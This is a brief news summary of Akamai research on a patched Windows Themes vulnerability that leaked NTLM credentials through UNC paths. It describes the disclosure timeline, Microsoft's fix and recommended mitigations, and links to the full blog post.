Akamai security researcher Tomer Peled discovered a spoofing vulnerability in Microsoft Themes, allowing an attacker to coerce NTLM credentials.
The vulnerability affects all Windows versions and was fixed in January’s Patch Tuesday 2024.
Exploiting the vulnerability requires the victim to download a theme file, triggering an automatic authentication coercion attack.
The attack works by changing values in the theme file to UNC paths pointing to an attacker-controlled server, leading to credential sending.
With NTLM credentials, an attacker can perform an NTLM relay attack or crack the victim’s password.
Microsoft patched the vulnerability by adding checks for UNC paths in theme files.
Mitigation involves blocking NTLM authentication in SMB, using group policies, and implementing microsegmentation.
The vulnerability was disclosed to Microsoft in September 2023 and patched in January 2024.
Full Post :
https://www.akamai.com/blog/security-research/leaking-ntlm-credentials-through-windows-themes